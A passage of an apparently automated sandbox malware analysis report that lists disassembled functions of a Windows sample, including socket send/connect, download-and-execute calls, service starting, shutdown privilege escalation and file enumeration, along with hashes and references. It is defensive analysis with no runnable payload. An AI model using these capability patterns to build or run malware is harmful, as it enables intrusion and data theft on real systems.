                                                                                                                                                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                                                                                                                                                            Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                                                                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                                                                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                                                                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                                                                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                                                                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
                                                                                                                                                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
                                                                                                                                                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4043647387-0
                                                                                                                                                                                                                                            • Opcode ID: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                                                                            • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7e51efc752b031afc58cf73032587facd122f1466f4da27dadf7484b984f89b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                                                                                                                                                            Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                                                                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 276877138-0
                                                                                                                                                                                                                                            • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                                                                            • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                                                                                                                                                            Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                                                            • String ID: @CG$XCG$>G
                                                                                                                                                                                                                                            • API String ID: 341183262-3030817687
                                                                                                                                                                                                                                            • Opcode ID: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                                                                            • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d89068bf95987aa1d708424f7af8f01dfdc6c5c004a65f310861421951643d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                                            Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                                                                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                                                                                                                                                            • Opcode ID: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
                                                                                                                                                                                                                                            • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e4698fe78d44acac16c4ddae03765096e4e2cb4d027e838fe1b9563e95c49cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                                                                                                                                                            Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045128C
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512B5
                                                                                                                                                                                                                                            • GetACP.KERNEL32 ref: 004512CA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                            • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                                                                                                                                                                                                                                            Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                            • String ID: SETTINGS
                                                                                                                                                                                                                                            • API String ID: 3473537107-594951305
                                                                                                                                                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                            • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                                                                                                                                                                                                            Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32 ref: 004514D3
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004515A4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 745075371-0
                                                                                                                                                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                            • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                                                                                                                                            Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1157919129-0
                                                                                                                                                                                                                                            • Opcode ID: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                                                                                                                                                                                                            • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                                                                                                                                            Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\iGhDjzEiDU.exe$open
                                                                                                                                                                                                                                            • API String ID: 2825088817-1303315117
                                                                                                                                                                                                                                            • Opcode ID: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
                                                                                                                                                                                                                                            • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                                                                                                                                            Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                                                                                                                                                            • String ID: x@G$x@G
                                                                                                                                                                                                                                            • API String ID: 4113138495-3390264752
                                                                                                                                                                                                                                            • Opcode ID: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                                                                                                                                                                                                            • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                                                                            Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                            • Opcode ID: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                                                                                                                                                                                                            • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                                                                                                                                            Function 0041BB81 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                                                              • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                                                                                                                                                            • Opcode ID: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
                                                                                                                                                                                                                                            • Instruction ID: 2aa0b6b87930d0e8bc36fe4f809622c3d335fadd5e5dd78f891cc162e383a86f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F06232B8021422D529357A4E2FBEE1801D796B20F54002FF202A97E6FB8E4AD142DE
                                                                                                                                                                                                                                            Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 00450B71
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CB2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4212172061-0
                                                                                                                                                                                                                                            • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                                                                            • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                                                                                                                                            Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                                                                            • String ID:
